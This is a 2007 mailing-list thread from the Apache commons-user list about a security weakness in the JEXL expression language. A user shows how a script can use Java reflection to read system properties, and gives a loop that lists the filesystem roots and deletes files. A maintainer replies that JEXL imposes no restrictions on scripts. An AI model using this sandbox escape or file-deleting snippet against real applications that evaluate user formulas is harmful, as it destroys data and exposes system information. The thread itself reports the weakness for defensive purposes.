commons-user mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Dion Gillard" <d...@trongus.com>
Subject Re: JEXL security issue with system properties
Date Fri, 26 Oct 2007 08:35:46 GMT
JEXL doesn't place any security restrictions on what you can do with
the script itself.


On 10/6/07, Trevor Harrison <trevorsharrison@gmail.com> wrote:
> Replying to myself:
>
> On 10/4/07, Trevor Harrison <trevorsharrison@gmail.com> wrote:
> > While looking for other ways to 'break' out, I started thinking about
> > classloaders.  I haven't succeeded in getting a classloader yet in a
> > script, but if I could, it would be bad for my intended usage of JEXL
> > (as a fairly secure way of executing user supplied formulas).
> >
> > // this doesn't work
> > cl = intClazz.getClassLoader();  // this fails, returns a null
>
> Well, still not sure why that method is returning a null for the
> classloader, but if I call (the much simpler) clazz.forName(), I can
> get a reference to a class:
>
> i = 0;
> intClazz = i.class;
> clazz = intClazz.forName("java.lang.System");
> m = clazz.getMethod("getProperties", null);
> p = m.invoke(null, null);
>
> which successfully gets me the system properties.  Which is probably
> the least of my worries, considering I could do something like:
>
> i = 0;
> intClazz = i.class;
> clazz = intClazz.forName("java.io.File");
> m = clazz.getMethod("listRoots", null);
> roots = m.invoke(null, null);
> files = roots[0].listFiles();
> foreach( file in files )
> {
>   file.delete();
> }
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
> For additional commands, e-mail: user-help@commons.apache.org
>
>


-- 
dIon Gillard
Rule #131 of Acquisition: Information is Profit.

---------------------------------------------------------------------
To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
For additional commands, e-mail: user-help@commons.apache.org


Mime
View raw message